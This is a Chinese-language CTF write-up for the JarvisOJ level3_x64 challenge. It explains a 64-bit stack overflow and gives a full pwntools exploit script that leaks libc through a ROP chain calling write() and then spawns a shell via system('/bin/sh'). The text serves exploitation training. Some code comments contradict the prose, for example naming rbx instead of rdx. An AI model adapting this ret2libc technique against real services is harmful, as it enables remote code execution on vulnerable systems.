簡(jiǎn)介 :

項(xiàng)目地址 : https://coding.net/u/yihangwang/p/pwnme/git(pwn題目及 writeup 匯總)
下載地址 : https://dn.jarvisoj.com/challengefiles/level3_x64.rar.8e639c3daf929853a1bc654d79c7992c```

---
####地址 : 

nc pwn2.jarvisoj.com 9883

---
####分析 : 

該題和 level3 的代碼相比 :

1. 少了在 read() 函數(shù)之前調(diào)用 write() 函數(shù)
2. 64 位函數(shù)調(diào)用需要使用寄存器傳參
   我們可以利用 read() 函數(shù)先溢出修改返回地址到 .plt 表中的 write() 函數(shù)
   這樣我們就可以通過構(gòu)造 write() 函數(shù)的調(diào)用棧來打印出 got 表中 read() 或者 write() 函數(shù)的地址
   那么我們知道了地址 , 就可以通過 libc 來尋找到 system() 函數(shù)的偏移地址了
   然后再構(gòu)造 sytem() 的調(diào)用棧
   但是這里存在一個(gè)問題 :
   當(dāng)我們想要構(gòu)造 write() 函數(shù)的調(diào)用棧的時(shí)候 , 參數(shù)的傳遞需要通過寄存器傳參的方式進(jìn)行
   也就是說要調(diào)用 write(0, read_got, 0x08)
   我們需要將 :
   rdi 設(shè)置為 0
   rsi 設(shè)置為 read() 函數(shù)在 got 表中的地址
   rdx 設(shè)置為 0x08
   我們來通過 ropper 來尋找一下 pop rdi; ret 指令 , 發(fā)現(xiàn)可以成功在可執(zhí)行程序中找到
   pop rsi; ret 也可以順利找到
   但是 pop rdx; ret 卻找不到 , 這個(gè)時(shí)候應(yīng)該怎么辦呢 ?
   如果我們不設(shè)置 rdx寄存器的值的話 , 那在 write() 調(diào)用的時(shí)候就會(huì)直接取得 rdx 之前的值
   我們可以考慮一下 , 我們這里只需要獲取 write() 返回的前八個(gè)字節(jié)作為地址
   那么就算打印的數(shù)據(jù)較多 , 也并不會(huì)影響什么 , 只需要能保證 rdx 寄存器的值大于 8 即可
   經(jīng)過調(diào)試發(fā)現(xiàn)這里 rdx 的值確實(shí)是大于 8 的 , 這樣我們就只需要接收前八個(gè)字節(jié)作為地址即可
   這樣就 leak 出了 libc 中 read 函數(shù)的真實(shí)地址 , 接下來就比較常規(guī)了
   system 只需要傳遞一個(gè)參數(shù) , 直接使用之前的 pop rdi 即可

---
####利用代碼 : 
```python
#!/usr/bin/env python
# encoding:utf-8

from pwn import *

#sun@ubuntu:~/pwnme/lessons/jarvisoj/9$ readelf -a libc-2.19.so | grep " read@"
#   883: 00000000000eb6a0    90 FUNC    WEAK   DEFAULT   12 read@@GLIBC_2.2.5
#sun@ubuntu:~/pwnme/lessons/jarvisoj/9$ readelf -a libc-2.19.so | grep " system@"
#  1337: 0000000000046590    45 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.2.5
#sun@ubuntu:~/pwnme/lessons/jarvisoj/9$ readelf -a libc-2.19.so | grep " exit@"
#   126: 000000000003c1e0    21 FUNC    GLOBAL DEFAULT   12 exit@@GLIBC_2.2.5
#sun@ubuntu:~/pwnme/lessons/jarvisoj/9$ strings -a -t x libc-2.19.so | grep "/bin/sh"
# 17c8c3 /bin/sh

read_libc_address = 0xeb6a0
bin_sh_libc_address = 0x17c8c3
system_libc_address = 0x46590
exit_libc_address = 0x3c1e0

payload = "A" * 0x80 + "BBBBBBBB"
payload += p64(0x4006b3) # pop rdi;ret
payload += p64(0x01) # stdin; 1st argv for write()
payload += p64(0x4006b1) # pop rsi;ret
payload += p64(0x600A60) # .got.plt read(); 2nd argv for write()
payload += p64(0) # junk
# I assuming that rbx is bigger than 8 , and in fact it is so.
#payload += p64(0x1b92) # pop rdx;ret
#payload += p64(0x10) # write 4 bytes; 3rd argv for write()
payload += p64(0x4004B0) # write() .plt
payload += p64(0x4005E6) # vulnerable_function()

Io = remote("pwn2.jarvisoj.com", 9883)
# Io = process("./level3_x64")
Io.recvuntil("Input:\n")

Io.send(payload)

temp = Io.recv(8)

read_address = u64(temp[0:8]) 
offset = read_address - read_libc_address

bin_sh_address = offset + bin_sh_libc_address
system_address = offset + system_libc_address
exit_address = offset + exit_libc_address

payload = "A" * 0x80 + "BBBBBBBB"
payload += p64(0x4006b3) # pop rdi;ret
payload += p64(bin_sh_address) # /bin/sh ; argv for system()
payload += p64(system_address) # address of system()
payload += p64(exit_address)

Io.send(payload)

Io.interactive()